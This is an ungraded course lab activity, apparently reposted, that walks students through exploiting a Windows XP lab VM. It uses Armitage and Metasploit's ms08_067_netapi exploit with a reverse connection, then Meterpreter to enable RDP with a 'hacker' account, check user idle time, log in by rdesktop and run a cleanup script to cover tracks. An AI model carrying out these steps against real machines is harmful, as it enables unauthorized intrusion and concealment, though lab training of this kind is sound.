Unit 4: Exploits and Exploiting 4.3 Activity and Discussion Activity: Armitage

ACTIVITY: ARMITAGE

This activity is ungraded.

Remember: Watch this Demo video. Seeing me complete the activity first will help you understand each of the steps.

• Armitage Demo

System: During this activity, you’ll continue to use Metasploit as shown in the first activity in this unit.

Software: In this activity you will use these applications and resources that are included in the Kali VM:

• Metasploit
• Meterpreter
• Armitage, a GUI front-end for the Metasploit Framework.

Time: This activity should take you approximately 30 minutes to complete.

Goal

To use the Armitage interface to configure an exploit in Metasploit. In this activity, you’ll use the same exploit and payload as in the first activity in this unit.

Instructions

Note: Hit Enter after each command.

Launch Armitage

1. In Metasploit, go to the top menu and select Applications > Favorites 08 - Exploitation Tools > Armitage.
2. Pop-up dialog boxes will ask you if you want to connect to the local network and start Metasploit. Answer yes to both.
   NOTE: The connection refused message will resolve itself in a second.
3. In the Armitage interface, on the top menu, select Hosts > Nmap Scan > Quick Scan (OS Detect) to discover all hosts on your subnet. You’ll need to provide your network ID and subnet mask (which in most cases will be 192.168.1.0/24).

When the scan is complete, a list of all discovered devices, including IP addresses, and in some cases, operating systems will appear in the upper pane.

The lower pane, using tabs, shows the commands you would enter into the console if you weren’t using this GUI, along with the corresponding output. If you want, you can type directly into this pane at the msf prompt.

Select and Deploy and Exploit

1. Click on the Windows XP system in the upper pane.
2. In the left panel, select exploit > windows > smb > ms08_067_netapi. Note than the options are already populated.
3. Check Use a reverse connection, and click Launch. When the machine is compromised, you will see a red border around the machine icon.
4. Right click on the host icon and click meterpreter1 > Interact > Meterpreter Shell. A meterpreter tab will open in the lower pane.
5. In the Meterpreter shell, enter info post/windows/manage/enable_rdp to open the remote desktop service.
6. To run the exploit, enter run post/windows/manage/enable_rdp username=hacker password=hacker.
7. Run the command idletime to get an idea if there is a person actively using the exploited machine currently.This information is handy for deciding whether to continue with the next steps now, or possibly after some time elapses.
8. In a new terminal, enter rdesktop -u hacker -p hacker 192.168.1.105 (using the IP address of your Windows XP system).

Now, we’re not restricted by the meterpreter shell or the Windows command line interface, and can freely interact with the Windows XP system that we have just compromised through the GUI.

After you’ve completed your activities in the compromised machine, run this cleanup script to remove the added account and cover your tracks: run multi_console_command –r [file listed in the output after you completed Step 6, above].

After you've finished, answer the Check Your Work questions.

You will continue to use meterpreter in the Windows XP VM in the next activity. If you are not continuing now, use the instructions in the activity Using Metasploit to get started again.

转载于:https://www.cnblogs.com/sec875/articles/10028586.html